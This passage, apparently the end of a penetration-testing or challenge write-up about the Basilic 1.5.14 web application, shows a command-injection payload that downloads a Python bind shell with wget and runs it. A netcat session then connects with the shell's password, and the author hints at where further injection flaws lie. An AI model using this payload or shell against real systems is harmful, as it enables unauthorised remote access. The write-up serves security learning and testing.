This is running ;wget -O /tmp/bind.py https://raw.githubusercontent.com/s7ephen/Tamatebako/master/bindshell.py;python /tmp/bind.py; to download the bind shell with wget, saving it to /tmp/bind.py and running it with the python interpreter.

This bind shell listens on port 2400 and has the password mtso. Thanks to s7ephen for the bind shell, here is his website.

After the request is sent we can use netcat to connect to it:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
root@dev2:~$ nc dev 2400
[8731] bindshell on port 2400
password? mtso
www-data@dev:/var/www/basilic-1.5.14/Intranet/Publications$ ls -l
ls -l
total 44
-rw-r--r-- 1 www-data www-data   227 Jun  3 12:42 index.html
-rw-r--r-- 1 www-data www-data  2549 Jun  3 12:42 menuPubli.php
-rw-r--r-- 1 www-data www-data 17212 Jun  3 12:42 publi.php
-rw-r--r-- 1 www-data www-data  8836 Jun  3 12:42 publiAction.php
-rw-r--r-- 1 www-data www-data  2529 Jun  3 12:42 updatePublis.php

Running this as is (just changing the host part of the URL) against the target machine works perfectly.

Conclusion

This application was one of the most poorly written applications I've ever seen. There are vulnerabilities at every turn and no attempt seems to have been made to fix them.

I would advise against using this application anywhere except for testing your pentesting skills.

Lastly I'd like to add that the command injection vulnerability I found isn't actually in the updatePubliDocs.php file or even in a call to the system PHP function. So as well as looking for where the vulnerability I found actually was (Hint: its in a call to the exec PHP function) there is still probably another command injection vulnerability in the calls to system.

This was a fun challenge.

Happy Hacking :-)